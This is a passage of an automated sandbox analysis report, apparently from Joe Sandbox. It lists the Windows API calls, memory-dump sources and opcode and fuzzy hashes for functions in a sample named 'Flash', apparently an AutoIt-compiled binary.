                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: 1cb8215e9a0acc9dc3134c8ed5e527de29675f2f21138892b9126d1f1e62e157
                                                        • Instruction ID: f05b06eaafb71056a2550617b6ea1b095bbd9624589e688731cd2f9f1791aa50
                                                        • Opcode Fuzzy Hash: 1cb8215e9a0acc9dc3134c8ed5e527de29675f2f21138892b9126d1f1e62e157
                                                        • Instruction Fuzzy Hash: 411143B9D04209EFDB41CF98C984AEEBBF9FB48311F104156E914E3610D775AA658F50
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A5BCB6
                                                        • _memset.LIBCMT ref: 00A5BCC5
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A98F20,00A98F64), ref: 00A5BCF4
                                                        • CloseHandle.KERNEL32 ref: 00A5BD06
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: 11d8ce751a2331add05665316d5f094068e600154936afaca6a91236b2ff46ef
                                                        • Instruction ID: 0327234173914a1e26973a73732d7fe08c07668116e1262f1193ebbf0eb992ff
                                                        • Opcode Fuzzy Hash: 11d8ce751a2331add05665316d5f094068e600154936afaca6a91236b2ff46ef
                                                        • Instruction Fuzzy Hash: 57F054B26403087FE65067A55C05FB73A5DEB0A751F045422FB08D5191DFB9481187A8
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A371A1
                                                          • Part of subcall function 00A37C7F: _memset.LIBCMT ref: 00A37CB4
                                                        • _memmove.LIBCMT ref: 00A371C4
                                                        • _memset.LIBCMT ref: 00A371D1
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A371E1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: 38a0192e03aae17d7acd628232053830bdbe82aae7d1be8027a07a1c7a93af18
                                                        • Instruction ID: d7aaa3062cf35764fa34d3860748ebb6ba6125f8db082ce3862551315e61dc17
                                                        • Opcode Fuzzy Hash: 38a0192e03aae17d7acd628232053830bdbe82aae7d1be8027a07a1c7a93af18
                                                        • Instruction Fuzzy Hash: 00F05476100104ABCF016F55DC85F5ABB29EF45320F08C051FE089E21ACB75A951DBB4
                                                        APIs
                                                          • Part of subcall function 009D16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D1729
                                                          • Part of subcall function 009D16CF: SelectObject.GDI32(?,00000000), ref: 009D1738
                                                          • Part of subcall function 009D16CF: BeginPath.GDI32(?), ref: 009D174F
                                                          • Part of subcall function 009D16CF: SelectObject.GDI32(?,00000000), ref: 009D1778
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A5C3E8
                                                        • LineTo.GDI32(00000000,?,?), ref: 00A5C3F5
                                                        • EndPath.GDI32(00000000), ref: 00A5C405
                                                        • StrokePath.GDI32(00000000), ref: 00A5C413
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: 6be8f8c081b73c8390797716999347516698d5a39c88eeb44d336e89ff4ebd8e
                                                        • Instruction ID: 443da3fcf695540b67b334b7651d6a6043cc565915f8183b61180220c3663f9d
                                                        • Opcode Fuzzy Hash: 6be8f8c081b73c8390797716999347516698d5a39c88eeb44d336e89ff4ebd8e
                                                        • Instruction Fuzzy Hash: 72F0E232045218BBDB13AF90AC0DFCF3F69AF06321F048000FA11211E187F55596DFA9
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A2AA6F
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A2AA82
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A2AA89
                                                        • AttachThreadInput.USER32(00000000), ref: 00A2AA90
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: c385c099bddbbd9980aef5f31826117f79a70dea2b9cde68802dc36e806656a6
                                                        • Instruction ID: 0e62ba0a7d03dd82aea862f694aff3596811628427caa44b4c8e7ef55410aac4
                                                        • Opcode Fuzzy Hash: c385c099bddbbd9980aef5f31826117f79a70dea2b9cde68802dc36e806656a6
                                                        • Instruction Fuzzy Hash: 39E0C931545228BBDB219FA6ED0DEEB7F6CEF267A1F008025F50995090C6F18591CBA1
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 009D260D
                                                        • SetTextColor.GDI32(?,000000FF), ref: 009D2617
                                                        • SetBkMode.GDI32(?,00000001), ref: 009D262C
                                                        • GetStockObject.GDI32(00000005), ref: 009D2634
                                                        • GetWindowDC.USER32(?,00000000), ref: 00A0C1C4
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A0C1D1
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00A0C1EA
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00A0C203
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00A0C223
                                                        • ReleaseDC.USER32(?,00000000), ref: 00A0C22E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 77310133fd8d29e6cab196167cf8299a9b59e88682aef481a85e5bcc35556028
                                                        • Instruction ID: b1a8982e61fc30b530051135d207c80f20a5f1e3d7eb0c4033455a4ec8791772
                                                        • Opcode Fuzzy Hash: 77310133fd8d29e6cab196167cf8299a9b59e88682aef481a85e5bcc35556028
                                                        • Instruction Fuzzy Hash: 15E06531504248BFDB219FA4BC09BD93B21EB16332F048366FA69480E187B145C1DB11
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00A29339
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A28F04), ref: 00A29340
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A28F04), ref: 00A2934D
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A28F04), ref: 00A29354
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: cb8a97ad26a44f545f20d61736ca567fc7152c46186bd4b8525243ed13e02685
                                                        • Instruction ID: 8d6c9b3c5e4c519274018b1aa6f8629ee717db57b45a7744c36ffde3059fc2a2
                                                        • Opcode Fuzzy Hash: cb8a97ad26a44f545f20d61736ca567fc7152c46186bd4b8525243ed13e02685
                                                        • Instruction Fuzzy Hash: BCE04F32601221ABD7209FF56D0DF573B7CAF50B92F114828E345C9090E6B49486C754
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00A10679
                                                        • GetDC.USER32(00000000), ref: 00A10683
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A106A3
                                                        • ReleaseDC.USER32(?), ref: 00A106C4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 95efdcd002d19aca2f3fa07b753fb3ecb53e6610fc04047d32b75571f95199a4
                                                        • Instruction ID: 51b33eb656f7abfb21cbd9c94d330e3dcb0c18efacbfd732fa1d5355bf3c0520
                                                        • Opcode Fuzzy Hash: 95efdcd002d19aca2f3fa07b753fb3ecb53e6610fc04047d32b75571f95199a4
                                                        • Instruction Fuzzy Hash: 12E0E575840204EFCB019FA0D808A9EBBB2AB8C310F11C416F85AA7250DBF895929F50
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00A1068D
                                                        • GetDC.USER32(00000000), ref: 00A10697
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A106A3
                                                        • ReleaseDC.USER32(?), ref: 00A106C4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 54d1d10cdeb3ff22572c705c208560872627ab2fb179e562b1095bf4c737cb2a
                                                        • Instruction ID: 93e89242b3980fe052e1b69eaac7ff938ba9c3420f96b35400786a8a4e8efb1a
                                                        • Opcode Fuzzy Hash: 54d1d10cdeb3ff22572c705c208560872627ab2fb179e562b1095bf4c737cb2a
                                                        • Instruction Fuzzy Hash: E2E01A75840204AFCB019FA0D808A5EBBF1AB8C310F11C415F959A7350DBF895928F50
                                                        APIs
                                                          • Part of subcall function 009E436A: _wcscpy.LIBCMT ref: 009E438D
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • __wcsnicmp.LIBCMT ref: 00A3B670
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A3B739
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: d87ae7dfe673937e7c89f34c5544b231912af7271d0609f7b1160690d5115313
                                                        • Instruction ID: 7b2123c78fcd7f54fbd79b0d97fefc5cd390a61759576b2f03c544e7b738ca51
                                                        • Opcode Fuzzy Hash: d87ae7dfe673937e7c89f34c5544b231912af7271d0609f7b1160690d5115313
                                                        • Instruction Fuzzy Hash: 6D61A875A10219EFCB14DF94C895FAEB7B5EF88710F14805AF646AB391D770AE40CBA0
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 009DE01E
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 009DE037
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 88d5b4dc20d2bf66884b5a99667ea5f9f90a54d18ac73a0f96435a8dbb24996b
                                                        • Instruction ID: 8f64b092219720e5e89589bee6bc3f46b0a4f2e4aa23c54f05c7d64d6ef6940a
                                                        • Opcode Fuzzy Hash: 88d5b4dc20d2bf66884b5a99667ea5f9f90a54d18ac73a0f96435a8dbb24996b
                                                        • Instruction Fuzzy Hash: EF5139714487449BE320AF54EC85BABBBF8FBC4714F41894DF1D841191EB709569CB16
                                                        APIs
                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00A58186
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A5819B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 03c2b43ca67075b6f911e365104482067834cb67b48f7e68f34d9341578e5c6a
                                                        • Instruction ID: 3200478119b1393eeec784a46e4d1aa78e5b4b1bbd892d3ccae38db65d800856
                                                        • Opcode Fuzzy Hash: 03c2b43ca67075b6f911e365104482067834cb67b48f7e68f34d9341578e5c6a
                                                        • Instruction Fuzzy Hash: 0D410874A016099FDB14CF68C981BDA7BB5FF08301F10416AED05EB391DB75A956CFA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A42C6A
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A42CA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: ee2184e63631ad165ea34582fd93e901aa14bee52177160136b3cbca47eaeecf
                                                        • Instruction ID: 650844cf20f61c61c7ed5b5bf66e34111d9e0a322c0d8c5efaea8400638ce3b3
                                                        • Opcode Fuzzy Hash: ee2184e63631ad165ea34582fd93e901aa14bee52177160136b3cbca47eaeecf
                                                        • Instruction Fuzzy Hash: 3C313A71C00219ABCF06EFA1CC85EEEBFB9FF48300F100019F915A6262EB315956DBA0
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00A5713C
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A57178
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 24bd6f250cf2a6e3468b9a46bbfde3e85800e63a27a773632dcbcd28016cca56
                                                        • Instruction ID: cb7a71e64f620d0f4036a40a465d896287e6a1e9cd527e7406db26270a0f824f
                                                        • Opcode Fuzzy Hash: 24bd6f250cf2a6e3468b9a46bbfde3e85800e63a27a773632dcbcd28016cca56
                                                        • Instruction Fuzzy Hash: 69318B71100604AAEB11DF68DC80EFF77BAFF88721F109619FDA5971A0DA31AC85CB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A330B8
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A330F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 165032c525904b8fa89586b29ca4b5487aa0893cc00b78dd8d27d352fe579f25
                                                        • Instruction ID: b2076b05386a15db5199ca64586163de9a287a116e2c139aa5a42f759673f752
                                                        • Opcode Fuzzy Hash: 165032c525904b8fa89586b29ca4b5487aa0893cc00b78dd8d27d352fe579f25
                                                        • Instruction Fuzzy Hash: AE31E633A08209EBEF24CF58D886BAEBBB8EF05350F148119F985A61A1D7709B44CB50
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00A44132
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        • Opcode ID: 7a42c434b4aedb9ec1c09ed1997f21303e4cd39b59789dad3f99b6127d82a905
                                                        • Instruction ID: 44e5ee536d9be3657e59b4fbaff49b941c56a3f51c9cabf2a04d7f9c2efa1690
                                                        • Opcode Fuzzy Hash: 7a42c434b4aedb9ec1c09ed1997f21303e4cd39b59789dad3f99b6127d82a905
                                                        • Instruction Fuzzy Hash: 57219134A0021DABCF11EF69D891FAE77B5BF98340F404455F905A7242DB70AD85CBA1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A56D86
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A56D91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 003e439d80bc855803e0b5f64680bec08e2cb2bf3e3436a4ea8ae94a7594037c
                                                        • Instruction ID: 36640a376949b6fb317519cc81acc06371d92298039c7e1eb0790c63fc6c2257
                                                        • Opcode Fuzzy Hash: 003e439d80bc855803e0b5f64680bec08e2cb2bf3e3436a4ea8ae94a7594037c
                                                        • Instruction Fuzzy Hash: FB119072310608BFEF119F54DC81EBB3B7AFB883A5F504525FD149B290D6719C558760
                                                        APIs
                                                          • Part of subcall function 009D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009D214F
                                                          • Part of subcall function 009D2111: GetStockObject.GDI32(00000011), ref: 009D2163
                                                          • Part of subcall function 009D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 009D216D
